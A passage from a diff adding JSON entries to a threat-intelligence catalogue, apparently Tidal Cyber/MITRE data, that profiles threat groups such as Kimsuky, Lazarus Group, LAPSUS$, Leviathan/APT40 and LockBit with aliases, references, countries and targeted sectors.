"STOLEN PENCIL" + }, + { + "description": "[[Cybereason Kimsuky November 2020](https://app.tidalcyber.com/references/ecc2f5ad-b2a8-470b-b919-cb184d12d00f)][[Malwarebytes Kimsuky June 2021](https://app.tidalcyber.com/references/9a497c56-f1d3-4889-8c1a-14b013f14668)]", + "meta": { + "id": "e873e5fe-ed66-45ce-9268-fe13de26cbfd" + }, + "related": [ + { + "dest-uuid": "37f317d8-02f0-43d4-8a7d-7a65ce8aadf1", + "type": "similar" + } + ], + "uuid": "c6cbcc71-4931-460b-8676-b638be841995", + "value": "Thallium" + }, + { + "description": "[[Cybereason Kimsuky November 2020](https://app.tidalcyber.com/references/ecc2f5ad-b2a8-470b-b919-cb184d12d00f)][[Malwarebytes Kimsuky June 2021](https://app.tidalcyber.com/references/9a497c56-f1d3-4889-8c1a-14b013f14668)]", + "meta": { + "id": "7e398a52-c8ba-44be-ac42-e8c002cb7833" + }, + "related": [ + { + "dest-uuid": "37f317d8-02f0-43d4-8a7d-7a65ce8aadf1", + "type": "similar" + } + ], + "uuid": "983f8775-5730-4400-92b3-ef3643b2b33c", + "value": "Black Banshee" + }, + { + "description": "[[Zdnet Kimsuky Dec 2018](https://app.tidalcyber.com/references/b17acdc3-0163-4c98-b5fb-a457a7e6b58d)][[ThreatConnect Kimsuky September 2020](https://app.tidalcyber.com/references/45d64462-2bed-46e8-ac52-9d4914608a93)][[Malwarebytes Kimsuky June 2021](https://app.tidalcyber.com/references/9a497c56-f1d3-4889-8c1a-14b013f14668)]", + "meta": { + "id": "132b93a4-31e4-4ddf-9138-1c14b8405ece" + }, + "related": [ + { + "dest-uuid": "37f317d8-02f0-43d4-8a7d-7a65ce8aadf1", + "type": "similar" + } + ], + "uuid": "983d7efc-068e-41b2-96da-524af88985a8", + "value": "Velvet Chollima" + }, + { + "description": "[Kimsuky](https://app.tidalcyber.com/groups/37f317d8-02f0-43d4-8a7d-7a65ce8aadf1) is a North Korea-based cyber espionage group that has been active since at least 2012. The group initially focused on targeting South Korean government entities, think tanks, and individuals identified as experts in various fields, and expanded its operations to include the United States, Russia, Europe, and the UN. [Kimsuky](https://app.tidalcyber.com/groups/37f317d8-02f0-43d4-8a7d-7a65ce8aadf1) has focused its intelligence collection activities on foreign policy and national security issues related to the Korean peninsula, nuclear policy, and sanctions.[[EST Kimsuky April 2019](https://app.tidalcyber.com/references/8e52db6b-5ac3-448a-93f6-96a21787a346)][[BRI Kimsuky April 2019](https://app.tidalcyber.com/references/b72dd3a1-62ca-4a05-96a8-c4bddb17db50)][[Cybereason Kimsuky November 2020](https://app.tidalcyber.com/references/ecc2f5ad-b2a8-470b-b919-cb184d12d00f)][[Malwarebytes Kimsuky June 2021](https://app.tidalcyber.com/references/9a497c56-f1d3-4889-8c1a-14b013f14668)][[CISA AA20-301A Kimsuky](https://app.tidalcyber.com/references/685aa213-7902-46fb-b90a-64be5c851f73)]\n\n[Kimsuky](https://app.tidalcyber.com/groups/37f317d8-02f0-43d4-8a7d-7a65ce8aadf1) was assessed to be responsible for the 2014 Korea Hydro & Nuclear Power Co. compromise; other notable campaigns include Operation STOLEN PENCIL (2018), Operation Kabar Cobra (2019), and Operation Smoke Screen (2019).[[Netscout Stolen Pencil Dec 2018](https://app.tidalcyber.com/references/6d3b31da-a784-4da0-91dd-b72c04fd520a)][[EST Kimsuky SmokeScreen April 2019](https://app.tidalcyber.com/references/15213a3c-1e9f-47fa-9864-8ef2707c7fb6)][[AhnLab Kimsuky Kabar Cobra Feb 2019](https://app.tidalcyber.com/references/4035e871-9291-4d7f-9c5f-d8482d4dc8a7)]\n\nNorth Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) instead of tracking clusters or subgroups.", + "meta": { + "country": "KP", + "group_attack_id": "G0094", + "observed_countries": [ + "JP", + "KR", + "RU", + "TH", + "GB", + "US" + ], + "observed_motivations": [ + "Cyber Espionage" + ], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Defense", + "Education", + "Energy", + "Government", + "Media", + "NGOs", + "Pharmaceuticals", + "Think Tanks" + ] + }, + "related": [ + { + "dest-uuid": "11901dae-ceb9-4469-8529-f517d6489ca8", + "type": "similar" + }, + { + "dest-uuid": "c6cbcc71-4931-460b-8676-b638be841995", + "type": "similar" + }, + { + "dest-uuid": "983f8775-5730-4400-92b3-ef3643b2b33c", + "type": "similar" + }, + { + "dest-uuid": "983d7efc-068e-41b2-96da-524af88985a8", + "type": "similar" + } + ], + "uuid": "37f317d8-02f0-43d4-8a7d-7a65ce8aadf1", + "value": "Kimsuky" + }, + { + "description": "[[MSTIC DEV-0537 Mar 2022](https://app.tidalcyber.com/references/a9ce7e34-6e7d-4681-9869-8e8f2b5b0390)]", + "meta": { + "id": "0c1bf460-0c44-4fd4-94e3-4f6dbf3c3595" + }, + "related": [ + { + "dest-uuid": "0060bb76-6713-4942-a4c0-d4ae01ec2866", + "type": "similar" + } + ], + "uuid": "fc95e9b7-ae40-4a2f-b1f6-a42facc3c237", + "value": "DEV-0537" + }, + { + "description": "[LAPSUS$](https://app.tidalcyber.com/groups/0060bb76-6713-4942-a4c0-d4ae01ec2866) is cyber criminal threat group that has been active since at least mid-2021. [LAPSUS$](https://app.tidalcyber.com/groups/0060bb76-6713-4942-a4c0-d4ae01ec2866) specializes in large-scale social engineering and extortion operations, including destructive attacks without the use of ransomware. The group has targeted organizations globally, including in the government, manufacturing, higher education, energy, healthcare, technology, telecommunications, and media sectors.[[BBC LAPSUS Apr 2022](https://app.tidalcyber.com/references/6c9f4312-6c9d-401c-b20f-12ce50c94a96)][[MSTIC DEV-0537 Mar 2022](https://app.tidalcyber.com/references/a9ce7e34-6e7d-4681-9869-8e8f2b5b0390)][[UNIT 42 LAPSUS Mar 2022](https://app.tidalcyber.com/references/50f4c1ed-b046-405a-963d-a113324355a3)]", + "meta": { + "group_attack_id": "G1004", + "observed_countries": [], + "observed_motivations": [], + "source": "MITRE", + "tags": [ + "2e5f6e4a-4579-46f7-9997-6923180815dd", + "c9c73000-30a5-4a16-8c8b-79169f9c24aa", + "a2e000da-8181-4327-bacd-32013dbd3654", + "5e7433ad-a894-4489-93bc-41e90da90019" + ], + "target_categories": [] + }, + "related": [ + { + "dest-uuid": "fc95e9b7-ae40-4a2f-b1f6-a42facc3c237", + "type": "similar" + } + ], + "uuid": "0060bb76-6713-4942-a4c0-d4ae01ec2866", + "value": "LAPSUS$" + }, + { + "description": "The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA.[[US-CERT HIDDEN COBRA June 2017](https://app.tidalcyber.com/references/8e57cea3-ee37-4507-bb56-7445050ec8ca)][[US-CERT HOPLIGHT Apr 2019](https://app.tidalcyber.com/references/e722b71b-9042-4143-a156-489783d86e0a)]", + "meta": { + "id": "6d6d0a15-350e-442b-bbe8-cfc28f40b9e0" + }, + "related": [ + { + "dest-uuid": "0bc66e95-de93-4de7-b415-4041b7191f08", + "type": "similar" + } + ], + "uuid": "df5caef8-2e25-4ddd-ae58-2c9ad119834d", + "value": "HIDDEN COBRA" + }, + { + "description": "[[CrowdStrike Labyrinth Chollima Feb 2022](https://app.tidalcyber.com/references/ffe31bbf-a40d-4285-96a0-53c54298a680)]", + "meta": { + "id": "2a2d3baf-5277-43cc-9209-abffd7cc4529" + }, + "related": [ + { + "dest-uuid": "0bc66e95-de93-4de7-b415-4041b7191f08", + "type": "similar" + } + ], + "uuid": "a7be1337-efab-48a8-9bf4-6f300291d150", + "value": "Labyrinth Chollima" + }, + { + "description": "[[US-CERT HIDDEN COBRA June 2017](https://app.tidalcyber.com/references/8e57cea3-ee37-4507-bb56-7445050ec8ca)]", + "meta": { + "id": "f01a88d1-c368-48ca-a8f6-30286ed86e4b" + }, + "related": [ + { + "dest-uuid": "0bc66e95-de93-4de7-b415-4041b7191f08", + "type": "similar" + } + ], + "uuid": "618bd388-b295-4076-a63e-c1e2515dab4e", + "value": "Guardians of Peace" + }, + { + "description": "[[Microsoft ZINC disruption Dec 2017](https://app.tidalcyber.com/references/99831838-fc8f-43fa-9c87-6ccdf5677c34)]", + "meta": { + "id": "63a91edc-9911-42e9-9970-a3f77fda65a9" + }, + "related": [ + { + "dest-uuid": "0bc66e95-de93-4de7-b415-4041b7191f08", + "type": "similar" + } + ], + "uuid": "4fc58da4-8398-43f9-b037-fd873ed5864e", + "value": "ZINC" + }, + { + "description": "[[Secureworks NICKEL ACADEMY Dec 2017](https://app.tidalcyber.com/references/aa7393ad-0760-4f27-a068-17beba17bbe3)]", + "meta": { + "id": "00f50f21-fee3-4328-b628-5e0096489cea" + }, + "related": [ + { + "dest-uuid": "0bc66e95-de93-4de7-b415-4041b7191f08", + "type": "similar" + } + ], + "uuid": "b7b671c3-2339-4521-a12d-b57821ad5c12", + "value": "NICKEL ACADEMY" + }, + { + "description": "", + "meta": { + "id": "142273a2-ed90-4ba2-8375-bdc3398a7db5", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "0bc66e95-de93-4de7-b415-4041b7191f08", + "type": "similar" + } + ], + "uuid": "972c0eea-6037-4aac-ac22-e1e991898dcb", + "value": "Diamond Sleet" + }, + { + "description": "[Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) is a North Korean state-sponsored cyber threat group that has been attributed to the Reconnaissance General Bureau.[[US-CERT HIDDEN COBRA June 2017](https://app.tidalcyber.com/references/8e57cea3-ee37-4507-bb56-7445050ec8ca)][[Treasury North Korean Cyber Groups September 2019](https://app.tidalcyber.com/references/54977bb2-2929-41d7-bdea-06d39dc76174)] The group has been active since at least 2009 and was reportedly responsible for the November 2014 destructive wiper attack against Sony Pictures Entertainment as part of a campaign named Operation Blockbuster by Novetta. Malware used by [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) correlates to other reported campaigns, including Operation Flame, Operation 1Mission, Operation Troy, DarkSeoul, and Ten Days of Rain. [[Novetta Blockbuster](https://app.tidalcyber.com/references/bde96b4f-5f98-4ce5-a507-4b05d192b6d7)]\n\nNorth Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) instead of tracking clusters or subgroups, such as [Andariel](https://app.tidalcyber.com/groups/2cc997b5-5076-4eef-9974-f54387614f46), [APT37](https://app.tidalcyber.com/groups/013fdfdc-aa32-4779-8f6e-7920615cbf66), [APT38](https://app.tidalcyber.com/groups/dfbce236-735c-436d-b433-933bd6eae17b), and [Kimsuky](https://app.tidalcyber.com/groups/37f317d8-02f0-43d4-8a7d-7a65ce8aadf1). ", + "meta": { + "country": "KP", + "group_attack_id": "G0032", + "observed_countries": [ + "AU", + "IN", + "IL", + "KR", + "RU", + "US" + ], + "observed_motivations": [ + "Cyber Espionage", + "Destruction", + "Financial Gain" + ], + "source": "MITRE", + "tags": [ + "f2ae2283-f94d-4f8f-bbde-43f2bed66c55" + ], + "target_categories": [ + "Aerospace", + "Casinos Gambling", + "Defense", + "Entertainment", + "Financial Services", + "Government", + "Infrastructure" + ] + }, + "related": [ + { + "dest-uuid": "68391641-859f-4a9a-9a1e-3e5cf71ec376", + "type": "similar" + }, + { + "dest-uuid": "df5caef8-2e25-4ddd-ae58-2c9ad119834d", + "type": "similar" + }, + { + "dest-uuid": "a7be1337-efab-48a8-9bf4-6f300291d150", + "type": "similar" + }, + { + "dest-uuid": "618bd388-b295-4076-a63e-c1e2515dab4e", + "type": "similar" + }, + { + "dest-uuid": "4fc58da4-8398-43f9-b037-fd873ed5864e", + "type": "similar" + }, + { + "dest-uuid": "b7b671c3-2339-4521-a12d-b57821ad5c12", + "type": "similar" + }, + { + "dest-uuid": "972c0eea-6037-4aac-ac22-e1e991898dcb", + "type": "similar" + } + ], + "uuid": "0bc66e95-de93-4de7-b415-4041b7191f08", + "value": "Lazarus Group" + }, + { + "description": "[LazyScripter](https://app.tidalcyber.com/groups/12279b62-289e-49ee-97cb-c780edd3d091) is threat group that has mainly targeted the airlines industry since at least 2018, primarily using open-source toolsets.[[MalwareBytes LazyScripter Feb 2021](https://app.tidalcyber.com/references/078837a7-82cd-4e26-9135-43b612e911fe)]", + "meta": { + "group_attack_id": "G0140", + "observed_countries": [], + "observed_motivations": [], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Travel Services" + ] + }, + "related": [], + "uuid": "12279b62-289e-49ee-97cb-c780edd3d091", + "value": "LazyScripter" + }, + { + "description": "[[Dragos Raspite Aug 2018](https://app.tidalcyber.com/references/bf4ccd52-0a03-41b6-bde7-34ead90171c3)]", + "meta": { + "id": "8f5e7cb9-6aa8-4115-ab23-fbc6bf4fc287" + }, + "related": [ + { + "dest-uuid": "b5c28235-d441-40d9-8da2-d49ba2f2568b", + "type": "similar" + } + ], + "uuid": "044d8fd0-faad-4e9f-bc5a-807e7147a331", + "value": "Raspite" + }, + { + "description": "[Leafminer](https://app.tidalcyber.com/groups/b5c28235-d441-40d9-8da2-d49ba2f2568b) is an Iranian threat group that has targeted government organizations and business entities in the Middle East since at least early 2017. [[Symantec Leafminer July 2018](https://app.tidalcyber.com/references/01130af7-a2d4-435e-8790-49933e041451)]", + "meta": { + "country": "IR", + "group_attack_id": "G0077", + "observed_countries": [ + "IL", + "KW", + "LB", + "SA", + "US" + ], + "observed_motivations": [ + "Cyber Espionage" + ], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Aerospace", + "Construction", + "Energy", + "Financial Services", + "Government", + "Telecommunications", + "Transportation", + "Utilities" + ] + }, + "related": [ + { + "dest-uuid": "044d8fd0-faad-4e9f-bc5a-807e7147a331", + "type": "similar" + } + ], + "uuid": "b5c28235-d441-40d9-8da2-d49ba2f2568b", + "value": "Leafminer" + }, + { + "description": "[[CISA AA21-200A APT40 July 2021](https://app.tidalcyber.com/references/3a2dbd8b-54e3-406a-b77c-b6fae5541b6d)][[Crowdstrike KRYPTONITE PANDA August 2018](https://app.tidalcyber.com/references/42fe94f5-bc4c-4b0b-9c35-0bc32cbc5d79)]", + "meta": { + "id": "bb7b96da-5773-4314-af76-c9125e49ec76" + }, + "related": [ + { + "dest-uuid": "eadd78e3-3b5d-430a-b994-4360b172c871", + "type": "similar" + } + ], + "uuid": "e7a109ad-fa21-4fcf-a1fb-2a497146db2b", + "value": "Kryptonite Panda" + }, + { + "description": "[[CISA AA21-200A APT40 July 2021](https://app.tidalcyber.com/references/3a2dbd8b-54e3-406a-b77c-b6fae5541b6d)][[SecureWorks BRONZE MOHAWK n.d.](https://app.tidalcyber.com/references/b741fe9a-4b08-44b9-b6e7-5988eee486a3)]", + "meta": { + "id": "bf460be9-8968-4e1e-ad4e-8217a9878636" + }, + "related": [ + { + "dest-uuid": "eadd78e3-3b5d-430a-b994-4360b172c871", + "type": "similar" + } + ], + "uuid": "5b71f978-8056-47a9-b4f9-d2520fc396a0", + "value": "BRONZE MOHAWK" + }, + { + "description": "FireEye reporting on TEMP.Periscope (which was combined into APT40) indicated TEMP.Periscope was reported upon as Leviathan.[[CISA AA21-200A APT40 July 2021](https://app.tidalcyber.com/references/3a2dbd8b-54e3-406a-b77c-b6fae5541b6d)][[Proofpoint Leviathan Oct 2017](https://app.tidalcyber.com/references/f8c2b67b-c097-4b48-8d95-266a45b7dd4d)][[FireEye Periscope March 2018](https://app.tidalcyber.com/references/8edb5d2b-b5c4-4d9d-8049-43dd6ca9ab7f)][[FireEye APT40 March 2019](https://app.tidalcyber.com/references/8a44368f-3348-4817-aca7-81bfaca5ae6d)]", + "meta": { + "id": "156ac67f-c989-40a6-80bd-2273bae6e46e" + }, + "related": [ + { + "dest-uuid": "eadd78e3-3b5d-430a-b994-4360b172c871", + "type": "similar" + } + ], + "uuid": "06d1c9bb-8951-4e14-a775-9a248d6390cf", + "value": "APT40" + }, + { + "description": "[[CISA AA21-200A APT40 July 2021](https://app.tidalcyber.com/references/3a2dbd8b-54e3-406a-b77c-b6fae5541b6d)][[Accenture MUDCARP March 2019](https://app.tidalcyber.com/references/811d433d-27a4-4411-8ec9-b3a173ba0033)]", + "meta": { + "id": "c86cf832-0c84-4960-a735-26c763fb9d37" + }, + "related": [ + { + "dest-uuid": "eadd78e3-3b5d-430a-b994-4360b172c871", + "type": "similar" + } + ], + "uuid": "97a136d2-2bb1-44ed-a33b-cf87374b24a7", + "value": "MUDCARP" + }, + { + "description": "[[CISA AA21-200A APT40 July 2021](https://app.tidalcyber.com/references/3a2dbd8b-54e3-406a-b77c-b6fae5541b6d)][[MSTIC GADOLINIUM September 2020](https://app.tidalcyber.com/references/ee352214-421f-4778-ac28-949142a8ef2a)]", + "meta": { + "id": "a028aacc-e48b-4418-ba6b-7e7d52e4bebb" + }, + "related": [ + { + "dest-uuid": "eadd78e3-3b5d-430a-b994-4360b172c871", + "type": "similar" + } + ], + "uuid": "82ac97dc-8c3e-4fd1-a7a1-76b8513143e1", + "value": "Gadolinium" + }, + { + "description": "[Leviathan](https://app.tidalcyber.com/groups/eadd78e3-3b5d-430a-b994-4360b172c871) was previously reported upon by FireEye as TEMP.Periscope and TEMP.Jumper.[[CISA AA21-200A APT40 July 2021](https://app.tidalcyber.com/references/3a2dbd8b-54e3-406a-b77c-b6fae5541b6d)][[FireEye APT40 March 2019](https://app.tidalcyber.com/references/8a44368f-3348-4817-aca7-81bfaca5ae6d)]", + "meta": { + "id": "100c99e9-8cd0-4b27-8707-c42ca0b70acb" + }, + "related": [ + { + "dest-uuid": "eadd78e3-3b5d-430a-b994-4360b172c871", + "type": "similar" + } + ], + "uuid": "c9c9a804-2635-4a47-b63c-9ad5363454a3", + "value": "TEMP.Jumper" + }, + { + "description": "[Leviathan](https://app.tidalcyber.com/groups/eadd78e3-3b5d-430a-b994-4360b172c871) was previously reported upon by FireEye as TEMP.Periscope and TEMP.Jumper.[[CISA AA21-200A APT40 July 2021](https://app.tidalcyber.com/references/3a2dbd8b-54e3-406a-b77c-b6fae5541b6d)][[FireEye Periscope March 2018](https://app.tidalcyber.com/references/8edb5d2b-b5c4-4d9d-8049-43dd6ca9ab7f)][[FireEye APT40 March 2019](https://app.tidalcyber.com/references/8a44368f-3348-4817-aca7-81bfaca5ae6d)]", + "meta": { + "id": "327de388-915c-4457-9508-99fb0916a1cd" + }, + "related": [ + { + "dest-uuid": "eadd78e3-3b5d-430a-b994-4360b172c871", + "type": "similar" + } + ], + "uuid": "58f19fca-8c3b-424a-8e1d-cb3996f36417", + "value": "TEMP.Periscope" + }, + { + "description": "[Leviathan](https://app.tidalcyber.com/groups/eadd78e3-3b5d-430a-b994-4360b172c871) is a Chinese state-sponsored cyber espionage group that has been attributed to the Ministry of State Security's (MSS) Hainan State Security Department and an affiliated front company.[[CISA AA21-200A APT40 July 2021](https://app.tidalcyber.com/references/3a2dbd8b-54e3-406a-b77c-b6fae5541b6d)] Active since at least 2009, [Leviathan](https://app.tidalcyber.com/groups/eadd78e3-3b5d-430a-b994-4360b172c871) has targeted the following sectors: academia, aerospace/aviation, biomedical, defense industrial base, government, healthcare, manufacturing, maritime, and transportation across the US, Canada, Europe, the Middle East, and Southeast Asia.[[CISA AA21-200A APT40 July 2021](https://app.tidalcyber.com/references/3a2dbd8b-54e3-406a-b77c-b6fae5541b6d)][[Proofpoint Leviathan Oct 2017](https://app.tidalcyber.com/references/f8c2b67b-c097-4b48-8d95-266a45b7dd4d)][[FireEye Periscope March 2018](https://app.tidalcyber.com/references/8edb5d2b-b5c4-4d9d-8049-43dd6ca9ab7f)]", + "meta": { + "country": "CN", + "group_attack_id": "G0065", + "observed_countries": [ + "BE", + "KH", + "CA", + "DE", + "HK", + "MY", + "NO", + "PH", + "SA", + "CH", + "GB", + "US" + ], + "observed_motivations": [], + "source": "MITRE", + "tags": [ + "931d2342-5165-41cf-a5a9-8308d9c9f7ed" + ], + "target_categories": [ + "Aerospace", + "Defense", + "Education", + "Government", + "Healthcare", + "Manufacturing", + "Maritime", + "Transportation" + ] + }, + "related": [ + { + "dest-uuid": "5b4b6980-3bc7-11e8-84d6-879aaac37dd9", + "type": "similar" + }, + { + "dest-uuid": "e7a109ad-fa21-4fcf-a1fb-2a497146db2b", + "type": "similar" + }, + { + "dest-uuid": "5b71f978-8056-47a9-b4f9-d2520fc396a0", + "type": "similar" + }, + { + "dest-uuid": "06d1c9bb-8951-4e14-a775-9a248d6390cf", + "type": "similar" + }, + { + "dest-uuid": "97a136d2-2bb1-44ed-a33b-cf87374b24a7", + "type": "similar" + }, + { + "dest-uuid": "82ac97dc-8c3e-4fd1-a7a1-76b8513143e1", + "type": "similar" + }, + { + "dest-uuid": "c9c9a804-2635-4a47-b63c-9ad5363454a3", + "type": "similar" + }, + { + "dest-uuid": "58f19fca-8c3b-424a-8e1d-cb3996f36417", + "type": "similar" + } + ], + "uuid": "eadd78e3-3b5d-430a-b994-4360b172c871", + "value": "Leviathan" + }, + { + "description": "[[Trend Micro LockBit Spotlight February 08 2023](/references/f72dade0-ec82-40e7-96a0-9f124d59bd35)]", + "meta": { + "id": "b2f86534-0c1e-4c6a-81af-7c4f9f9bc3dc", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "d0f3353c-fbdd-4bd5-8793-a42e1f319b59", + "type": "similar" + } + ], + "uuid": "d35be61a-d6d9-4572-8d1f-60367e982f88", + "value": "Water Selkie" + }, + { + "description": "This object represents the LockBit Ransomware-as-a-Service (\"RaaS\") apex group and the behaviors associated with its various affiliate ransomware operators. Specific affiliate operations defined by the research community will be tracked as separate objects.\n\nRansomware labeled \"LockBit\" was first observed in 2020. LockBit developers have introduced multiple versions of the LockBit encryption tool. According to the U.S. Cybersecurity and Infrastructure Security Agency (\"CISA\"), the following major LockBit variants have been observed (first-observed dates in parentheses): ABCD (LockBit malware's predecessor; September 2019), LockBit (January 2020), LockBit 2.0 (June 2021), LockBit Linux-ESXi Locker (October 2021), LockBit 3.0 (March 2022), LockBit Green (a variant that incorporates source code from Conti ransomware; January 2023), and variants capable of targeting macOS environments (April 2023). As of June 2023, CISA reported that the web panel that offers affiliates access to LockBit malware explicitly listed the LockBit 2.0, LockBit 3.0, LockBit Green, and LockBit Linux-ESXi Locker variants.[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]\n\nSince emerging in 2020, the LockBit group and its affiliates have carried out a very large number of attacks involving a wide range of victims around the world. In June 2023, the U.S. Federal Bureau of Investigation reported it had identified 1,700 LockBit attacks since 2020.[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)] According to data collected by the [ransomwatch project](https://github.com/joshhighet/ransomwatch) and analyzed by Tidal, LockBit actors publicly claimed 970 victims in 2022 (576 associated with the LockBit 2.0 variant and 394 associated with LockBit 3.0), the most of any extortion threat that year. Through April 2023, LockBit had claimed 406 victims, more than double the number of the next threat (Clop, with 179 victims).[[GitHub ransomwatch](/references/62037959-58e4-475a-bb91-ff360d20c1d7)] CISA reported in June 2023 that U.S. ransoms paid to LockBit since January 2020 totaled $91 million.[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]\n\nLockBit affiliate operators are known to use a wide variety of techniques during their attacks. Initial access for LockBit infections has occurred via most methods (including a number of vulnerability exploits), and operators are known to abuse a range of free and open-source software tools for a variety of post-exploitation activities. In addition to victim data encryption, LockBit actors routinely exfiltrate victim data and threaten to leak this data for extortion purposes.\n\n**Related Vulnerabilities**: CVE-2021-22986, CVE-2023-0669, CVE-2023-27350, CVE-2021-44228, CVE-2021-22986, CVE-2020-1472, CVE-2019-0708, CVE-2018-13379[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]", + "meta": { + "group_attack_id": "G5004", + "observed_countries": [ + "AR", + "AU", + "AT", + "BE", + "BR", + "CA", + "CO", + "EG", + "FR", + "DE", + "HK", + "IN", + "ID", + "IL", + "IT", + "JP", + "KW", + "MY", + "MX", + "MA", + "NL", + "NZ", + "NO", + "PE", + "PH", + "PL", + "PT", + "RO", + "SG", + "ZA", + "ES", + "SE", + "CH", + "TW", + "TH", + "AE", + "GB", + "US", + "VE", + "VN" + ], + "observed_motivations": [ + "Financial Gain" + ], + "owner": "TidalCyberIan", + "source": "Tidal Cyber", + "tags": [ + "793f4441-3916-4b3d-a3fd-686a59dc3de2", + "1b5da77a-bf84-4fba-a6d7-8b3b8f7699e0", + "c79f7ba7-a2f2-43ff-8c78-521807ef6c92", + "3535caad-a155-4996-b986-70bc3cd5ce1e", + "d713747c-2d53-487e-9dac-259230f04460", + "fde4c246-7d2d-4d53-938b-44651cf273f1", + "964c2590-4b52-48c6-afff-9a6d72e68908", + "4fb4824e-1995-4c65-8c71-e818c0aa1086", + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "758c3085-2f79-40a8-ab95-f8a684737927", + "2185ed93-7e1c-4553-9452-c8411b5dca93", + "904ad11a-20ca-479c-ad72-74bd5d9dc7e4", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "15787198-6c8b-4f79-bf50-258d55072fee", + "15b77e5c-2285-434d-9719-73c14beba8bd", + "1b98f09a-7d93-4abb-8f3e-1eacdb9f9871", + "ecd84106-2a5b-4d25-854e-b8d1f57f6b75", + "2743d495-7728-4a75-9e5f-b64854039792", + "7e6ef160-8e4f-4132-bdc4-9991f01c472e", + "992bdd33-4a47-495d-883a-58010a2f0efb", + "e401022a-36ac-486d-8503-dd531410a927", + "1a7cb7b6-d151-4fc6-8de1-78f244ac9f72", + "5e7433ad-a894-4489-93bc-41e90da90019", + "7e7b0c67-bb85-4996-a289-da0e792d7172" + ], + "target_categories": [ + "Agriculture", + "Automotive", + "Banks", + "Casinos Gambling", + "Construction", + "Education", + "Energy", + "Financial Services", + "Government", + "Healthcare", + "High Tech", + "Hospitality Leisure", + "Insurance", + "Legal", + "Manufacturing", + "Maritime", + "Media", + "Non Profit", + "Pharmaceuticals", + "Retail", + "Technology", + "Telecommunications", + "Transportation", + "Utilities" + ] + }, + "related": [ + { + "dest-uuid": "d35be61a-d6d9-4572-8d1f-60367e982f88", + "type": "similar" + } + ], + "uuid": "d0f3353c-fbdd-4bd5-8793-a42e1f319b59", + "value": "LockBit Ransomware Actors & Affiliates" + }, + { + "description": "[[Spring Dragon Jun 2015](https://app.tidalcyber.com/references/2cc38587-a18e-47e9-a8bb-e3498e4737f5)][[Accenture Dragonfish Jan 2018](https://app.tidalcyber.com/references/f692c6fa-7b3a-4d1d-9002-b1a59f7116f4)]", + "meta": { + "id": "aa9a2a90-7816-42c8-841d-b74d5dbefbc0" + }, + "related": [ + { + "dest-uuid": "2849455a-cf39-4a9f-bd89-c2b3c1e5dd52", + "type": "similar" + } + ], + "uuid": "68a87557-6166-4fd7-8a18-4a4e43f9b949", + "value": "Spring Dragon" + }, + { + "description": "[[Accenture Dragonfish Jan 2018](https://app.tidalcyber.com/references/f692c6fa-7b3a-4d1d-9002-b1a59f7116f4)]", + "meta": { + "id": "cbe77f7b-df76-434a-a3f4-a62ac9e13f57" + }, + "related": [ + { + "dest-uuid": "2849455a-cf39-4a9f-bd89-c2b3c1e5dd52", + "type": "similar" + } + ], + "uuid": "e2890e51-1bc8-4302-9251-149a3f547d36", + "value": "DRAGONFISH" + }, + { + "description": "[Lotus Blossom](https://app.tidalcyber.com/groups/2849455a-cf39-4a9f-bd89-c2b3c1e5dd52) is a threat group that has targeted government and military organizations in Southeast Asia. [[Lotus Blossom Jun 2015](https://app.tidalcyber.com/references/46fdb8ca-b14d-43bd-a20f-cae7b26e56c6)]", + "meta": { + "group_attack_id": "G0030", + "observed_countries": [ + "HK", + "ID", + "PH", + "TW", + "VN" + ], + "observed_motivations": [ + "Cyber Espionage" + ], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Defense", + "Government" + ] + }, + "related": [ + { + "dest-uuid": "32fafa69-fe3c-49db-afd4-aac2664bcf0d", + "type": "similar" + }, + { + "dest-uuid": "68a87557-6166-4fd7-8a18-4a4e43f9b949", + "type": "similar" + }, + { + "dest-uuid": "e2890e51-1bc8-4302-9251-149a3f547d36", + "type": "similar" + } + ], + "uuid": "2849455a-cf39-4a9f-bd89-c2b3c1e5dd52", + "value": "Lotus Blossom" + }, + { + "description": "[LuminousMoth](https://app.tidalcyber.com/groups/b10aa4c0-10a1-5e08-8d9d-82ce95d45e6a) is a Chinese-speaking cyber espionage group that has been active since at least October 2020. [LuminousMoth](https://app.tidalcyber.com/groups/b10aa4c0-10a1-5e08-8d9d-82ce95d45e6a) has targeted high-profile organizations, including government entities, in Myanmar, the Philippines, Thailand, and other parts of Southeast Asia. Some security researchers have concluded there is a connection between [LuminousMoth](https://app.tidalcyber.com/groups/b10aa4c0-10a1-5e08-8d9d-82ce95d45e6a) and [Mustang Panda](https://app.tidalcyber.com/groups/4a4641b1-7686-49da-8d83-00d8013f4b47) based on similar targeting and TTPs, as well as network infrastructure overlaps.[[Kaspersky LuminousMoth July 2021](https://app.tidalcyber.com/references/e21c6931-fba8-52b0-b6f0-1c8222881fbd)][[Bitdefender LuminousMoth July 2021](https://app.tidalcyber.com/references/6b1ce8bb-4e77-59f3-87ff-78f4a1a10ad3)]", + "meta": { + "group_attack_id": "G1014", + "observed_countries": [], + "observed_motivations": [], + "source": "MITRE", + "tags": [], + "target_categories": [] + }, + "related": [], 